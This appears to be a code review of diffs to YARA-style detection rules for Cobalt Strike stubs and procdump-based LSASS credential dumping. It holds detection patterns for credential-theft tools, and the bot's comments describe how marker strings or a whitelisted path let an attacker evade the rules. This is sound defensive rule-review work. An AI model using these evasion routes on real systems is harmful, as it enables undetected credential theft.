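Review bot: On the new condition line the four -100 terms disarm the rule whenever the plain ASCII markers `Behavior:`, `Trojan:`, `mpattribute` or `HackTool:` appear anywhere in the scanned file, and with a `>=1` threshold that is the only thing between a matched stub pattern and an alert; any one of these words is trivial for an operator to embed in a stager to suppress detection. They appear intended to keep the rule from matching signature databases and files like this repository (whose description strings contain `HackTool:`) — a guess from the strings alone. If that is the intent, consider scoping the exclusion so a single injected word cannot switch the rule off, e.g. by requiring `mpattribute` together with at least one of the `Behavior:`/`Trojan:`/`HackTool:` prefixes, or by adding a filetype/filesize guard that distinguishes a signature store from a PE stub.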


@ -6,13 +6,13 @@ rule HackTool_Win64_CobaltStrike_F{
strings :
$a_01_0 = {b8 4f ec c4 4e 41 f7 e1 41 8b c1 c1 ea 02 41 ff c1 6b d2 0d 2b c2 8a 4c 18 10 41 30 0c 38 } //1
$a_03_1 = {31 d2 4c 8b 90 01 01 41 f7 f1 49 01 cb 48 ff c1 89 d0 8a 44 03 10 41 30 03 90 00 } //1
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //65436
$a_01_7 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //65436
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
$a_01_6 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //-100
$a_01_7 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //-100
condition:
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436) >=1
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100) >=1
}


@ -6,11 +6,11 @@ rule HackTool_Win64_CobaltStrike_F_{
strings :
$a_01_0 = {b8 4f ec c4 4e 41 f7 e1 41 8b c1 c1 ea 02 41 ff c1 6b d2 0d 2b c2 8a 4c 18 10 41 30 0c 38 } //1
$a_03_1 = {31 d2 4c 8b 90 01 01 41 f7 f1 49 01 cb 48 ff c1 89 d0 8a 44 03 10 41 30 03 90 00 } //1
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436) >=1
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100) >=1
}


@ -4,12 +4,12 @@ rule HackTool_Win64_DumpLsass_C{
description = "HackTool:Win64/DumpLsass.C,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //10 \procdump64.exe
$a_00_3 = {2d 00 6d 00 } //5 -m
$a_00_4 = {2f 00 6d 00 } //5 /m
condition:
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
}
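Review bot: The -10 exclusion for `\ProgramData\Microsoft\AzureWatson\0\procdump` on the new condition line is a pure path-prefix whitelist: a command line running `\procdump64.exe` with `-m`/`/m` from that directory scores at most 10+5+5-10 = 10, under the `>=15` threshold, so anyone who stages procdump under that path can dump LSASS unflagged. Whether a standard user can create that directory depends on the ACL of the `Microsoft` subtree under ProgramData, which is worth checking before relying on it. The exclusion is presumably meant for the Azure Watson agent's own invocations; a CMDHSTR-style rule cannot see the parent process or image signer, so if the path alone is the discriminator, consider documenting that assumption next to the string, e.g. `// exclusion relies on AzureWatson\0 not being user-writable -- verify`, or removing the term and handling the known benign parent elsewhere.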


@ -4,12 +4,12 @@ rule HackTool_Win64_DumpLsass_C_Ofn{
description = "HackTool:Win64/DumpLsass.C!Ofn,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 00 00 } //10
$a_00_3 = {2d 00 6d 00 } //5 -m
$a_00_4 = {2f 00 6d 00 } //5 /m
condition:
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
}
